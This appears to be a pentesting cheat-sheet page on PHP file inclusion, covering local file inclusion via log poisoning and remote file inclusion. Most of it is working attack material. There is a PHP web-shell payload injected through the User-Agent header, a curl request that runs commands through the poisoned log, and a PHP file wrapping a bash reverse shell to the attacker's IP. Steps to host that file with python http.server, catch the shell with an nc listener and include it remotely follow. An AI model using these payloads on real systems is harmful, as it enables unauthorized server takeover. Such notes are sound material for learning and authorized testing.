File Inclusion
This vulnerability exists when a file is referenced and any code in the referenced file is included in the code of the referencing page. In other words, the content of the retrieved file is interpreted and executed instead of just read and displayed.
There are two sub classes to this general vulnerability: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI is limited to including files that are on the web server whereas RFI includes files from off the web server.
LFI
Log Poisoning
Log poisoning is where you inject malicious code into the server's log and then execute that code with the LFI vulnerability.
Modifying User-Agent
Using Burp Suite or ZAP, modify the User-Agent to:
User-Agent: <?php echo '<pre>' . shell_exec($_GET['cmd'\]) . '</pre>';?>The
<pre>is used to preserver any line breaks in the output. If this is not included and the output is multi line, it would be easier to read by viewing the source.The
shell_execexecutes OS commandsAnother command that can be used is
system
The
$_GETis an associative array of variables that are passed as URL parameters.
Then include the log file using the LFI.
curl http://vulnsite.com/index.php?file=<path to log>&cmd=<command>RFI
RFI is usually easier to exploit since you can host the malicious file to be included. However, this does require that allow_url_include and allow_url_fopen to be set to '1' in the php configuration. By default allow_url_fopen is set to '1'; however allow_url_include is set to '0.'
To exploit this:
Create a malicious php file
<?php echo '<pre>' . shell_exec(/bin/bash -i >& /dev/tcp/<your ip>/<listen port> 0>&1) . '</pre>';?>Host the shell with a web browser
sudo python3 -m http.server 80Set up a listener
sudo nc -nvlp <port>Include the file using the RFI
curl http://vulnsite.com/index.php?file=http://<your server>/<file>
Last updated
Was this helpful?